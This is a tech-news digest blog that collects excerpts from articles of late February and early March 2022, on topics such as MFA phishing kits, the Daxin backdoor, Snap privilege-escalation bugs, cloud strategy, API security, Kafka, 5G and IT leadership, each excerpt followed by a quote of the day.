Daily Tech Digest by Kannan Subbiah

Daily Tech Digest - March 03, 2022

Multifactor Authentication Is Being Targeted by Hackers

Proofpoint found today’s phishing kits range from “simple open-source kits with human-readable code and no-frills functionality to sophisticated kits utilizing numerous layers of obfuscation and built-in modules that allow for stealing usernames, passwords, MFA tokens, social security numbers, and credit card numbers.” How? By sending phishing emails with links to a fake target website, like a login page, to naive users. That, of course, is old news. Hackers have been using that technique for ages. What this “new kind of kit” brings to the table is a malware-planted MitM transparent reverse proxy. With this residing on the target’s PC, it intercepts all the traffic including their credentials and session cookies even if the connection is to the real site. ... One such program, Modlishka, already automates these attacks. Polish security researcher Piotr Duszyński, said of it, “With the right reverse proxy targeting your domain over an encrypted, browser-trusted, communication channel one can really have serious difficulties in noticing that something was seriously wrong.”

How to choose a cloud data management architecture

Multi-cloud models incorporate one of more services from more than one cloud provider (and optionally may include on-premises or hybrid architectures). In this scenario, the difference is that services from multiple cloud providers are used. A DBMS offering and the applications that rely on it may be deployed both on-premises and/or on one or more clouds. As such, all of the considerations of hybrid cloud may apply with the added considerations of deploying software in multiple cloud environments. These offerings have historically been limited to independent software vendors (ISVs) rather than native CSPs, as the ISVs have more of a vested interest in making sure that their software runs in as many environments as possible. However, cloud service providers are increasingly engaging in multi-cloud and intercloud scenarios. The multi-cloud scenario generally appeals to end users who are concerned about cloud vendor lock-in and want to be able to move their applications easily to a different cloud provider.

How blockchain investigations work

Knowing the exact entity behind a batch of addresses can be crucial, and blockchain intelligence companies have ways of finding that. They aggregate information from multiple sources, often using off-chain data to enrich their understanding of transactions. They look at dark web forums, social media posts, and court papers among others. "You can be on Facebook, and you see [someone] soliciting funds in bitcoin and there's an address there," Redbord says. That address is copied and can be associated with a cybercriminal ring, a terrorist organization, or other illicit entities, depending on the case. Such nuggets of information are gathered by blockchain intelligence companies and stored for future references. "[We] are building a giant blacklist of cryptocurrency addresses," Redbord adds. This process of categorizing addresses is done in the background. Investigators using blockchain intelligence software simply input the address corresponding to the payment. Then, they can see the flow of digital money.

Will AI Ever Become Ubiquitous?

We’re entering an era where our personal data will be more valuable than ever, and consumers are beginning to wake up to that fact. A report in 2019 indicates over 60 percent of respondents felt connected devices were “creepy,” which will likely slow adoption of such devices. While all of this may sound daunting, there are some interesting innovations addressing the pain points. And you’re likely enjoying the benefits of this thinking without even realizing it. To understand, we have to go into a room filled with networking gear. Most of us are familiar with server rooms thanks to TV shows and movies where we see some generic, but high-tech, “data center.” What most consumers don’t realize is that companies don’t just upgrade all their data center hardware at once. Just as you likely don’t buy a new router when you buy a new laptop, data center components are swapped out over time, here and there, and can wind up as a patchwork of vendors and services. Some time ago, network administrators unified their management while allowing underlying systems to micro-manage the individual components.

IoT Deployment – How to Secure and Deploy Internet of Things Devices

Many IoT devices are connected to the internet and can be accessed by hackers from anywhere in the world. This makes them ripe for attack. Hackers can exploit vulnerabilities in these devices to gain access to sensitive data or even take control of them. Another issue is that many IoT devices are not well-integrated into existing IT security frameworks. As a result, they may not be properly protected against cyber threats. For example, many IoT devices lack adequate firewalls and intrusion detection systems, making them susceptible to attack. Finally, there is also a risk that malicious actors could weaponize IoT devices for use in DDoS attacks or other cyberattacks. For example, hackers could exploit vulnerabilities in smart TVs or other internet-connected devices to launch a devastating DDoS attack against a company or organization. To mitigate these security problems, organizations should take steps to secure their IoT devices properly. They should ensure that all devices have strong passwords and are routinely updated with the latest security patches.

The Cloud Challenge: Choice Paralysis and the Bad Strategy of “On-Premising” the Cloud

Here is the troubling fact: most organizations know that the cloud is different than on-prem, most of them also know the main differences. Yet, this knowledge doesn’t translate into better solutions. That is because most organizations face a challenge: "With all these cloud services out there, which one to use in each scenario?" Too many choices can lead developers/architects to some kind of decision paralysis. Instead of going through the many choices, they just resort to the most familiar. In the case of organizations who are used to building on-prem, this often means choosing the old-stack without even considering the alternatives. Having tens of cloud services is indeed a challenge (Azure has 400+ different services at the time of writing this, each service might have tens of built-in capabilities). However, it is still a good challenge to have. That is because if you’re not dealing with resolving this challenge you’re effectively dealing with the challenge of how to make the cloud behave like on-prem.

Software development is changing again. These are the skills companies are looking for

Today, good developers work across the stack – in fact, their success relies on their ability to engage with a range of stakeholders to deliver business outcomes, says Spencer Clarkson, chief technology officer at Verastar. "I think what makes a good developer nowadays is that rounded understanding," he says. "They need to be agile in working style, and also understand the concept of doing Agile development – fail fast, develop quickly." That's something that others recognise, too. Tech analyst Forrester says Agile delivery is critical to successful digital transformations, yet the best enterprises go even further. ... "Software development is now much more about gluing things together rather than building something from scratch," he says. "There's lots of good apps and products out there. It's how you glue them together – that's your IP. People need to have that aptitude first and be multiskilled second." Gartner also says organisations and their employees should be prepared to move in multiple strategic directions at once due to the ongoing requirements for innovation and digitisation.

Comparing Programming models: SYCL and CUDA

SYCL and CUDA serve the same purpose: to enhance performance through processing parallelization in varied architectures. However, SYCL offers more extendibility and code flexibility than CUDA while simplifying the coding process. Instead of using complex syntax, SYCL enables developers to use ISO C++ for programming. Unlike CUDA, SYCL is a pure C++ domain-specific embedded language that doesn’t require C++ extensions, allowing for a simple CPU implementation that relies on pure runtime rather than a particular compiler. SYCL is a competitive alternative to CUDA in terms of programmability. With SYCL, there’s no need for a complex toolchain to develop an application, and the tools ecosystem is readily available, ensuring a hassle-free development experience. SYCL doesn’t need separate source files for the host and device. Instead, you can find the code for the host and the device in the same C++ source file. SYCL implementations are capable of splitting up this source file, parsing the code, and sending it to the appropriate compilation backend.

Ban predictive policing systems in EU AI Act, says civil society

As it currently stands, the AIA lists four practices that are considered “an unacceptable risk” and which are therefore prohibited, including systems that distort human behaviour; systems that exploit the vulnerabilities of specific social groups; systems that provide “scoring” of individuals; and the remote, real-time biometric identification of people in public places. However, critics have previously told Computer Weekly that while the proposal provides a “broad horizontal prohibition” on these AI practices, ...”. In their letter, published 1 March, the civil society groups explicitly call for predictive policing systems to be included in this list of prohibited AI practices, which is contained in Article 5 of the AIA. “To ensure that the prohibition is meaningfully enforced, as well as in relation to other uses of AI systems which do not fall within the scope of this prohibition, affected individuals must also have clear and effective routes to challenge the use of these systems via criminal procedure, to enable those whose liberty or right to a fair trial is at stake to seek immediate and effective redress,” it said.

IT leadership: 3 new rules for hybrid work

The very nature of the annual review sets up a dynamic where the manager critiques and the employee is on the defensive. The employee often feels that the manager focuses solely on shortcomings and not on achievements. They may wonder, “Why didn’t my manager mention this issue when it actually happened?” or “Why won’t my manager recognize the things I’ve done right?” The manager may be new to the position and not entirely familiar with the employee, their position, or work history, making a constructive review more challenging. In addition, many managers simply are not trained to communicate, coach, and lead effectively. With higher numbers of employees working remotely, reviews have an added layer of difficulty especially if they aren’t done in person. Body language can be harder to read. Without seeing the employee in action day-to-day, the manager might not be aware of how productive they are. Zoom fatigue can also cause many employees to remain silent rather than actively participate.

Quote for the day:

"Leadership is about carrying on when everyone else has given up." -- Gordon Tredgold

Daily Tech Digest - March 02, 2022

7 mistakes CISOs make when presenting to the board

“Board meetings are not a great place for surprises,” says James Nelson, vice president of information security at Illumio, and CISOs need to avoid being caught off guard by questions they can’t answer. “Preparation should include not just generating the content in your slides, but also thinking about what questions the board will potentially ask you and considering your answers ahead of time.” Nelson advises apprising any executive team attendees of both your prepared material and the questions you think will be asked, as well as how you plan to answer them. “They will know you can’t guess them all, but the process can help build trust,” he adds. ... A boardroom is not the place to unburden yourself, although it can be tempting when you feel the collective burden of everyone’s risks on your shoulders, says Watts. “Don’t be the prophecy of doom, and be very careful when using fear, uncertainty, and doubt (FUD) as a weapon of leverage—it can come back to bite you.” Instead, explain why you think a problem exists, and follow that with solution options, your recommendations, and their associated benefits, Watts continues. “Do this as a package.”

InfluxDB as an IoT Edge Historian: A Crawl/Walk/Run Approach

The question of how to get data into a database is one of the most fundamental aspects of data processing that developers face. Data collection can be challenging enough when you’re dealing with local devices. Adding data from edge devices presents a whole new set of challenges. Yet the exponential increase in IoT edge devices means that companies need proven and reliable ways to collect data from them. The following are three different approaches to collecting data from edge devices. Edge devices have different capabilities — processing power, memory capacity, connectivity, etc. — so finding the right solution for your use case may require a bit of trial and error. However, you can use these approaches as a jumping-off point for building your solution. For context, we’re using InfluxDB as the processing and storage solution, and the cloud version of InfluxDB is the target destination here. Each edge device in these examples also runs the open source version of InfluxDB. We’re using the Flux language to create tasks that perform data transformations and annotations.

Introducing Ballast: An Adaptive Load Test Framework

As Uber’s architecture has grown to encompass thousands of interdependent microservices, we need to test our mission-critical components at max load in order to preserve reliability. Accurate load testing allows us to validate if a set of services are working at peak usage and optimal efficiency while retaining reliability. Load testing those services within a short time frame comes with its unique set of challenges. Most of these load tests historically involved writing, running, and supervising tests manually. Moreover, the degree to which tests accurately represent production traffic patterns gradually decreases over time as traffic organically evolves, imposing a long-term maintenance burden. The scope of the load testing effort continuously increases as the number of services grows, incurring a hidden cost to adding new features. With this in mind, we developed Ballast, an adaptive load test framework that leverages traffic capture using Berkeley Packet Filter (BPF) and replays the traffic using a PID Controller mechanism to adjust the number of requests per second (RPS) to each service.

Why Israel's Ministry of Defense is moving to the public cloud

The Tel Aviv-based engineering head of the MOD's cloud initiative, who asked that his name not be published for his own security purposes, explained the reasoning behind the changeover. "So, we are a very conservative organization, as to say, we have sensitive information, various sensitivity and classifications, and most of the data processing we do on an on-premise network," the MoD Infrastructure Cloud Group Leader told ZDNet. "But the data grows, and we (now) can just grow with it. So when we go to a public cloud, we want to address our ever-growing compute needs. And the second level is the (distribution) of services -- hundreds and even thousands of software services. So for us, it is in essence, a digital transformation. We can't achieve what we need by staying at home on our on-premise networks." Using the Anjuna Confidential Cloud software, the MoD is now able to achieve public cloud scale, agility, and maximum data security immediately, without having to recode or refactor applications, the MoD project head said.

CISO Checklist for Offboarding Security Staff

"As companies deal with increased rates of employee turnover, they must also consider the fact that highly skilled ex-employees are leaving with key institutional knowledge and confidential information," warns Todd Moore, global head of encryption products at Thales, a France-based multinational provider of electrical systems and services for the aerospace, defense, transportation, and security markets. "This potentially increases the risk of data breaches and other cyber incidents, which is further amplified when data organization and protection is overseen by human managers." Leave nothing to chance or oversight by working with a checklist instead. "CISOs should already be monitoring and updating the access rights of all employees and manage administrator access periodically and have a list of tasks and procedures in place when employees leave," says Ahmad Zoua, senior project manager at Guidepost Solutions, a global security, compliance, and investigations consulting firm.

10 key ESG and sustainability trends for business, IT

CIOs have an important role in the growing concern for sustainability and other social conscious issues. "We live in a more technology-enabled and technology-dependent world than ever before, leaving CIOs with a great opportunity and an enormous responsibility," said Jahidul Khandaker, senior vice president and CIO of Western Digital, a U.S. computer hard disk drive manufacturer and data storage company, headquartered in San Jose, Calif. "CIOs must balance ... new [market] demands with how we respond to critical issues facing the world today, especially around the environment." Being proactive in these areas is critical. "Every enterprise is on the pathway to net-zero whether they have decided this for themselves at this point or not," Mingay said. "The only choice they have left is whether they want to lead, follow or get drawn in kicking and screaming." Regardless of how companies choose to engage, CIOs will have different roles, depending on those initiatives, Mingay said. Those roles can range from supporting leaders in other departments with the right information to taking on a more direct role in managing sustainability transformation, much like other digital transformation projects.

Avoiding the Chaotic 5G Rollout at Airports

The similarities between the C-band frequencies and those used by radio altimeters can lead to interference with these radio altimeters receiving the appropriate radio waves, resulting in the following risks: Risk of aircrafts’ engine and braking systems not transitioning to landing mode and therefore preventing an aircraft from stopping on the runway; Risk of the altimeter not being able to receive the waves or being able to distinguish between the waves that it is expecting to receive and other nearby waves, thereby giving the wrong reading or not functioning at all. The risks listed above could result in situations such as those of the two fatal crashes of the Boeing 737 Max plane in Indonesia and Ethiopia, which killed 346 people. The US Federal Aviation Administration (FAA) and airlines have shown concerns about these risks, which have led to wireless carriers that purchased 5G frequencies via the Federal Communications Commission (FCC) 5G Spectrum Auction and are implementing the 5G rollout (Verizon and AT&T) stating that they would delay the expansion of new 5G cellular service near some airports in order to avert damaging disruptions in airport operations.

Behavioral Analytics is getting trickier

Although most enterprise CISOs are fine with behavioral analytics on paper (on a whiteboard? As a message within Microsoft Teams/GoogleMeet/Zoom?), they're resistant to rapid widespread deployment because it requires creating a profile for every user — including partners, distributors, suppliers, large customers and anyone else who needs system access. Those profiles can take more than a month to create to get an accurate, consistent picture of each person. I hate to make this even worse, but there are now arguments that security admins don't need one profile for every user, but possibly dozens or more. Why? ... You now have a behavioral profile of that user. That profile, however, is likely based on the user’s regular behavior during normal workdays. What about when that user is exhausted, say possibly after arriving in the office from a red-eye flight? Or ecstatically happy or horribly depressed? Do they behave differently in an unfamiliar hotel room compared to the comfort of their home office? Do they act differently after their boss has screamed at them for 10 minutes?

Software development coaching dos and don’ts

Going one step beyond empathy requires software development managers to recognize the symptoms of people burning out. Signs of burnout include decreased productivity, increased cynicism toward colleagues, and a sense of detachment from the company. Dawn Parzych, manager of developer marketing at LaunchDarkly, believes that development teams can reduce stress by utilizing devops tools and practices. She shared a recent study showing that 91% of software development professionals who lack processes, such as using feature flags, report feeling stressed during deployments. She suggests, “As a manager, look to how you can remove stress and help your team members avoid burnout by improving build and deploy processes through the use of chaos days, observability, or feature flags.” ... Development managers should remind software developers that they don’t need to reinvent the wheel and code solutions from scratch all the time. There’s a wealth of software as a service, open source, cloud services, and low-code solutions available for developers to leverage.

Agile transformation: 5 ways to measure progress

In Agile workplaces, silos are broken down in favor of collaboration, communication, and transparency. To determine how well this is happening in your organization, assess the structures being put in place across projects. The presence of product owners in each of your scrum teams is a good starting point. A regular conversation with the product owners and scrum leaders can help you assess if the hierarchies are breaking down in favor of a more synergistic approach. Consider joining a few standup calls as an observer to get a first-hand understanding of how the development of a specific feature or assignment is moving between product owners, development teams, and quality assurance owners. A new business strategy can also be evaluated in terms of employee buy-in. If team members believe in the value and importance of Agile transformation, they will work harder to ensure its success. But if a critical mass of employees is skeptical about the change, they will make it harder to see a positive result.

Quote for the day:

"Power should be reserved for weightlifting and boats, and leadership really involves responsibility." -- Herb Kelleher

Daily Tech Digest - March 01, 2022

Using APIs with Low-Code Tools: 9 Best Practices

One of the best things about low- and no-code tools is their potential to get non-technical users involved in creating applications. But unless your non-technical colleagues understand what they can get out of using these tools — and unless they can use the tools without coding skills — it doesn’t matter which ones your organization adopts. “It’s all about users at the end of the day,” said Leonid Belkind, co-founder and chief technology officer at Torq, which provides a no-code security automation platform, “How many tools have you seen in your lifetime become shelfware? The organization bought it and nobody uses it. That’s the biggest risk. “How do you avoid it? Find out the motivation and goals people have and match the tool to it,” he added. If you put user needs first, “the chances of it becoming shelfware are significantly lower.” It’s important to not only find out users’ needs but ask them to explain how they now complete the tasks you’re trying to automate, Belkind said. Why is it important to identify who is going to work with the tool? he asked.

When NOT To Use Apache Kafka

If your application requires sub-millisecond latency, Kafka is not the right technology. For instance, high-frequency trading is usually implemented with purpose-built proprietary commercial solutions. Always keep in mind: the lowest latency would be to not use a messaging system at all and just use shared memory. In a race to the lowest latency, Kafka will lose every time. However, for the audit log and transaction log or persistence engine parts of the exchange, it is no data loss that becomes more important than latency and Kafka wins. Most real-time use cases "only" require data processing in the millisecond to the second range. In that case, Kafka is a perfect solution. ... Kafka is not a deterministic system. Safety-critical applications cannot use it for a car engine control system, a medical system such as a heart pacemaker, or an industrial process controller. ... Kafka requires good stable network connectivity between the Kafka clients and the Kafka brokers. Hence, if the network is unstable and clients need to reconnect to the brokers all the time, then operations are challenging, and SLAs are hard to reach.

5 Deadly Sins of Software Development

Curating software from a translation of codes that is executable by a computer and understandable by a human is not an easy task. Before jumping on the development tools, you must devote a fixed timeframe to understand your client’s business. Dig deep enough and understand HOW exactly is the software going to impact the workflow of the organization and the end-users. By doing so, you’ll get more clarity on what to work on and more importantly, what not to work on. Every software developer who has attained significant success will tell you to understand the resulting benefit of the software. This will allow you to only focus on stuff that holds value, while preemptively eliminating the most obvious changes that the client’s review team would recommend. So the next time you sit in front of your computer for a new software project, go through the project’s brief to comprehend the WHY of the software before you begin coding. Making the software eloquent and interactive for the user is what every developer strives for. But while doing so, you must take care that you don’t add too many features, which could eventually overwhelm the user. This is because a confused mind denies everything.

Here’s how algorithms are made

When an algorithm is implemented and verified against the ground truth, it becomes formulated into a mathematical object that can be later used in other algorithms. An algorithm must stand the test of time, prove its value in applications, and its usefulness in other scientific and applied work. Once proven, these algorithms become abstracted, taken as proven claims that need no further investigation. They become the basis and components of other algorithms, and contribute to further work in science. But an important point to underline here is that when the problem, ground-truth, and implementation are formulated into an abstract entity, all the small details, and facts that went into creating it become invisible and tend to be ignored. “If STS has long shown that scientific objects need to be manufactured in laboratories, the heavy apparatus of these locations as well as the practical work needed to make them operative tend to vanish as soon as written claims about scientific objects become certified facts,” Jaton writes in The Constitution of Algorithms.

How to empower IT Sec and Ops teams to anticipate and resolve IT problems

Runecast is a patented enterprise IT platform created for administrators, by administrators, and is tailored to the needs of those teams and enterprise leaders. Most importantly, though, it is a proactive platform aimed at helping IT admins anticipate potential problems before they become a headache and fix potential issues before they lead to service disruptions or exploitable vulnerabilities. The objective is reflected in the name of the company and the platform: casting (tossing) rune stones is how some cultures attempted to predict the future that would happen if no changes were made in the present. Runecast Analyzer does precisely this, and then provides actionable solutions to avoid damaging situations. Its power lies in Runecast AI Knowledge Automation (RAIKA), a technology that uses natural language processing (NLP) to crawl and analyze the previously mentioned mountain of available sources of unstructured knowledge to turn it all into machine-readable rules. RAIKA plugs into many different sources: knowledge base articles, online documentation, forums, blog posts, and even curated Twitter accounts of influencers.

How to Become a Data Scientist

Becoming a data scientist does not necessarily require a master’s degree. There is a significant shortage of data scientists, and some employers are comfortable hiring people who lack a degree, but have the experience needed. The majority of employed data scientists have a master’s degree, but over 25% do not. If you have the experience, a degree is not an absolute necessity to become employed as a data scientist. (If you are genuinely good at statistics, this may be a job for you. If you are not, by nature, good at statistics, this is probably not a job for you.) Data scientists process large amounts of data, often with the goal of increasing a business’ profits. Ideally, a data scientist has a strong understanding of statistics and statistical reasoning, computer languages, and business. They process and analyze large amounts of data to provide useful, meaningful information to their employers. These interpretations are used for decision-making. To provide this information, data scientists often work with messy, unstructured data, coming from emails, social media, and smart devices.

Edge computing and 5G: What's next for enterprise IT?

When people talk about 5G, they’re usually referring to the major telco networks (and 5G-enabled devices that connect to those networks), which have begun rolling out and will expand considerably over time. Those networks have enterprise impacts, of course. But the “next big thing” for many businesses may be private 5G networks. It’s not a perfect comparison, but a private 5G network is kind of like a private cloud – an answer to the question (among others): “What happens if I want to leverage the technology while retaining as much control as possible?” “In addition to typical 5G, increasingly enterprises are evaluating private 5G models to transform specific parts of their business,” says Joshi, the Everest Group analyst. “This combined with edge devices can meaningfully change the way enterprises work.” Joshi points to use cases such as smart stadiums, connected fleets, autonomous vehicles, smart ports, and remote health as examples where interest is already abundant and the combination of private/public 5G networks and edge architecture could flourish.

A Quick Look at Advanced IoT Sensors for the Enterprise Going Digital

Machine vision is frequently used in EIoT solutions, especially to perform quality control of products. However, these vision systems are complex and rather expensive, which makes them much more difficult for smaller companies to implement. Today, they can be replaced with modern IoT sensors, as Denso showed. Denso has developed the smallest stereo vision sensor for use in cars to help prevent collisions. These vision sensors are implemented in smart cameras and can also be used for object recognition, manufacturing process control, and product quality assurance. Small, practical equipment can be installed in a factory to monitor a large number of production points. A sensor called Visionary-T DT developed by the company Sick can detect objects at a distance of up to 160 ft. It is a 3D video sensor that uses Time-of-Flight (TOF) technology to detect the presence or absence of 3D objects. Solutions developed using this technology are candidates to be chosen to ensure the security of the Enterprise, and to protect objects or areas.

Anonymous Extends Its Russian Cyberwar to State-Run Media

Quantifying an uptick in cyber activity in Ukraine, Israeli firm Check Point said related attacks on Ukrainian government sites and its military increased by 196% in the first three days of the conflict. And as the situation on the ground has worsened, social media giants have considered or implemented stricter moderation policies over Russian disinformation efforts. Meta, the parent company of Facebook, says in a blog post that it has taken down a network run by users in Russia and Ukraine and is targeting the latter. Meta Head of Security Policy Nathaniel Gleicher and Director of Threat Disruption David Agranovich say the network violated its policy against "coordinated inauthentic behavior." Meta's security team says users created fake personae and claimed to be based in Kyiv - posing as news editors, a former aviation engineer and an author of a scientific publication on the science of mapping water. They claim there are similarities to a takedown in April 2020 that was connected to individuals in Russia, the disputed Donbas region in Ukraine and two now-sanctioned media organizations in Crimea.

Injecting fairness into machine-learning models

The machine-learning technique the researchers studied is known as deep metric learning, which is a broad form of representation learning. In deep metric learning, a neural network learns the similarity between objects by mapping similar photos close together and dissimilar photos far apart. During training, this neural network maps images in an “embedding space” where a similarity metric between photos corresponds to the distance between them. For example, if a deep metric learning model is being used to classify bird species, it will map photos of golden finches together in one part of the embedding space and cardinals together in another part of the embedding space. Once trained, the model can effectively measure the similarity of new images it hasn’t seen before. It would learn to cluster images of an unseen bird species close together, but farther from cardinals or golden finches within the embedding space. The similarity metrics the model learns are very robust, which is why deep metric learning is so often employed for facial recognition, Dullerud says.

Quote for the day:

"In a time of universal deceit - telling the truth is a revolutionary act." -- George Orwell

Daily Tech Digest - February 28, 2022

Follow your S curve

By the time Rogers’s seminal Diffusion of Innovations was published in 1962, the rural sociologist was convinced that the S curve of innovation diffusion depicted “a kind of universal process of social change.” Indeed, S curves have been used in many arenas since then, and Rogers’s book is among the most cited in the social sciences, according to Google Scholar. Johnson’s S Curve of Learning follows this well-established path. There’s the slow advancement toward a “launch point,” during which you canvas the (hopefully) myriad opportunities for career growth available to you and pick a promising one. Then there’s the fast growth once you hit the “sweet spot,” as you build momentum, forging and inhabiting the new you. And, finally, there is “mastery,” the stage in which you might cruise for a while, reaping the rewards of your efforts, before you start looking for something new, starting the cycle all over again. Johnson lays out six different roles that you must play as you travel along her learning curve. In the launch phase, where I spent what felt like an eternity, you first act as an Explorer, who searches for and picks a destination.

Automation: 5 issues for IT teams to watch in 2022

IT automation rarely involves IT alone. Virtually any initiative beyond the experimentation or proof-of-concept phase will involve at least two – and likely several – areas of the business. The more ambitious the goals, the truer this becomes. Good luck to the IT leaders that tackle “improve customer satisfaction ratings by X” or “reduce call wait times by Y” without involving marketing, customer service/customer experience, and other teams, for example. In fact, automation initiatives are best served by aligning various stakeholders from the very start – before specific goals (and metrics for evaluating progress toward those goals) are set. “It’s really important to identify the key benefits you wish to achieve and get all stakeholders on the same page,” says Mike Mason, global head of technology at Thoughtworks. This entails more than just rubber-stamping your way to a consensus that automation will be beneficial to the business. Stakeholders need to align on why they want to automate certain processes or workflows, what the impacts (including potential downsides) will be, and what success actually looks like. Presuming alignment on any of these issues can put the whole project at risk.

Daxin: Stealthy Backdoor Designed for Attacks Against Hardened Networks

Daxin is a backdoor that allows the attacker to perform various operations on the infected computer such as reading and writing arbitrary files. The attacker can also start arbitrary processes and interact with them. While the set of operations recognized by Daxin is quite narrow, its real value to attackers lies in its stealth and communications capabilities. Daxin is capable of communicating by hijacking legitimate TCP/IP connections. In order to do so, it monitors all incoming TCP traffic for certain patterns. Whenever any of these patterns are detected, Daxin disconnects the legitimate recipient and takes over the connection. It then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange. A successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin’s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules.

Leveraging mobile networks to threaten national security

Once threat actors have access to mobile telecoms environments, the threat landscape is such that several orders of magnitude of leverage are possible in the execution of cyberattacks. An ability to variously infiltrate, manipulate and emulate the operations of communications service providers and trusted brands – abusing the trust of countless people using their services every day – derives of threat actors’ capability to weaponize ‘trust’ built into the design itself of protocols, systems, and processes exchanging traffic between service providers globally. The primary point of leverage derives of the sustained capacity of threat actors over time to acquire data of targeting value including personally identifiable information for public and private citizens alike. While such information can be gained through cyberattacks directed to that end on the data-rich network environments of mobile operators themselves, the incidence of data breaches of major data holders across industries today is such that it is increasingly possible to simply purchase massive amounts of such data from other threat actors

A Security Technique To Fool Would-Be Cyber Attackers

Researchers demonstrate a method that safeguards a computer program’s secret information while enabling faster computation. Multiple programs running on the same computer may not be able to directly access each other’s hidden information, but because they share the same memory hardware, their secrets could be stolen by a malicious program through a “memory timing side-channel attack.” This malicious program notices delays when it tries to access a computer’s memory, because the hardware is shared among all programs using the machine. It can then interpret those delays to obtain another program’s secrets, like a password or cryptographic key. One way to prevent these types of attacks is to allow only one program to use the memory controller at a time, but this dramatically slows down computation. Instead, a team of MIT researchers has devised a new approach that allows memory sharing to continue while providing strong security against this type of side-channel attack. Their method is able to speed up programs by 12 percent when compared to state-of-the-art security schemes.

Is API Security the New Cloud Security?

While organizations previously used APIs more sparingly, predominantly for mobile apps or some B2B traffic, “now pretty much everything is powered by an API,” Klimek said. “So of course, all of these new APIs introduce a lot of security risks, and that’s why a lot of CISOs are now paying attention.” Imperva, which Gartner named a “leader” in its web application and API protection (WAAP) Magic Quadrant, lumps API security risks into two categories, according to Klimek. The first one, technical vulnerabilities, includes a bunch of risks that can also exist in standard web applications such as the OWASP Top 10 application security risks and CVE vulnerabilities. The recent Log4j vulnerability falls into this bucket — and demonstrates how far-reaching these types of security flaws can be. Most Imperva customers tackle these API threats first, “because they tend to be some of the most acute and they require just adopting their existing application security strategies,” such as code scanning during the development process and deploying web application firewalls or runtime application self-protection technology, Klimek explained.

Inside the blockchain developers’ mind: Building a free-to-use social DApp

While we still have a pretty good user experience, telling people they have to spend money before they can use an app is a barrier to entry and winds up feeling a whole lot like a fee. I would know, this is exactly what happened on our previous blockchain, Steem. To solve that problem, we added a feature called “delegation” which would allow people with tokens (e.g. developers) to delegate their mana (called Steem Power) to their users. This way, end-users could use Steem-based applications even if they didn’t have any of the native token STEEM. But, that design was very tailored to Steem, which did not have smart contracts and required users to first buy accounts. The biggest problem with delegations is that there was no way to control what a user did with that delegation. Developers want people to be able to use their DApps for free so that they can maximize growth and generate revenue in some other way like a subscription or through in-game item sales. They don’t want people taking their delegation to trade in decentralized finance (DeFi) or using it to play some other developer’s great game like Splinterlands.

Data governance at the speed of business

Once the data governance organization has been built and its initial policies defined, you can begin to build the muscles that will make data governance a source of nimbleness that will help you anticipate issues, seize opportunities, and pivot quickly as the business environment changes and new sources of data become available. Your data governance capability is responsible for identifying, classifying, and integrating these new and changing data sources, which may come in through milestone events such as mergers or via the deployment of new technologies within your organization. It does so by defining and applying a repeatable set of policies, processes, and supporting tools, the application of which you can think of as a gated process, a sequence of checkpoints new data must pass through to ensure its quality. The first step of the process is to determine what needs to be done to introduce the new data harmoniously. Take, for example, one of our B2B software clients that acquired a complementary company and sought to consolidate the firm’s customer data.

Irish data watchdog calls for ‘objective metrics’ for big tech regulation

Dixon said that “in some respects at least”, the DPC needs to do better and that it would be beneficial for regulators to have a “shared understanding” of what measures they are tracking. “In the absence of an agreed set of measures to determine achievements or deficiencies, the standing of the GDPR’s enforcement regime in overall terms is at risk of damage,” she said. Dixon said that this was particularly the case “when certain types of allegations” levelled against the Irish DPC “serve only to obscure the true nature and extent of the challenges” presented by the EU regulatory framework – which requires member states to legislate for the enforcement of data protection across the EU. ... That has created a vacuum and “a narrative has emerged in which the number of cases, the quantity and size of the administrative fines levied, are treated as the sole measure of success, informed by the effectiveness of financial penalties” at driving changes in behaviour.

Digital transformation: 3 roadblocks and how to overcome them

Many sectors, such as healthcare and financial services, operate within a complex web of constantly changing regulations that can be difficult to navigate. These regulations, while robust, are critical for sensitive data such as patient information in healthcare, proper execution of protocol in law enforcement, and other essential data that must be managed and used responsibly. How customer and internal data is collected, stored, managed, and used must be prioritized, especially when an enterprise transitions from legacy systems. Establishing a digital system that supports compliance with regulations is a challenge, but once the system is established, every interaction within the organization becomes data that can be monitored if you have the tools to interpret it. Knowing what is going on in every corner of an organization is central to remaining compliant, and setting up intelligent tools that can detect risk across the enterprise will ensure that your organization’s digital transformation is rooted in compliance-first strategies.

Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them. "-- Warren G. Bennis

Daily Tech Digest - February 27, 2022

Oh, Snap! Security Holes Found in Linux Packaging System

The first problem was the snap daemon snapd didn’t properly validate the snap-confine binary’s location. Because of this, a hostile user could hard-link the binary to another location. This, in turn, meant a local attacker might be able to use this issue to execute other arbitrary binaries and escalate privileges. The researchers also discovered that a race condition existed in the snapd snap-confine binary when preparing a private mount namespace for a snap. With this, a local attacker could gain root privileges by bind-mounting their own contents inside the snap’s private mount namespace. With that, they could make snap-confine execute arbitrary code. From there, it’s easy to start privilege escalation for an attacker to try to make it all the way to root. There’s no remote way to directly exploit this. But, if an attacker can log in as an unprivileged user, the attacker could quickly use this vulnerability to gain root privileges. Canonical has released a patch that fixes both security holes. The patch is available in the following supported Ubuntu releases: 21.10; 20.04, and 18.04. A simple system update will fix this nicely.

The DAO is a major concept for 2022 and will disrupt many industries

It is not yet clear where these disruptive technologies will lead us, but we are sure that there will be much value up for grabs. At the convergence of Web3 and NFTs lie many platforms looking to leverage technology and infrastructure to make the NFT ecosystem more decentralized, structured and community-driven. Using both social building and governance, the decentralized autonomous organization disruption is a notch higher. The DAO is one major invention that is challenging current systems of governance. Utilizing NFTs, DAOs are changing our perspective of how organizations and systems should be run, and they put further credence to the idea that the optimal form of governance does not have to do with hierarchical structures. With the principal-agent problem limiting the growth of organizations and preventing agents from feeling like part of a team, you can see why the need for decentralized organizations fostering community-inclusion is paramount. Is there something you would change about your current organization if given the chance? Leadership?

Use the cloud to strengthen your supply chain

What’s interesting about this process is that it does not entail executives in the C-suites pulling all-nighters to come up with these innovative solutions. It’s 100% automated using huge amounts of data and machine learning and embedding these things directly within business processes so the fix happens seconds after the supply chain problem is found. These aspects of intelligent supply chain automation are not new. For years, there has been some deep thinking in terms of how to automate supply chains more effectively. Those of you who specialize in supply chains understand this far too well. How many companies are willing to invest in the innovation—and even the risk—of leveraging these new systems? Most are not, and they are seeing the downsides from the markets tossing them curveballs that they try to deal with using traditional approaches. We’re seeing companies that have been in 10th place in a specific market move to second or third place by differentiating themselves with these intelligent cloud-based systems.

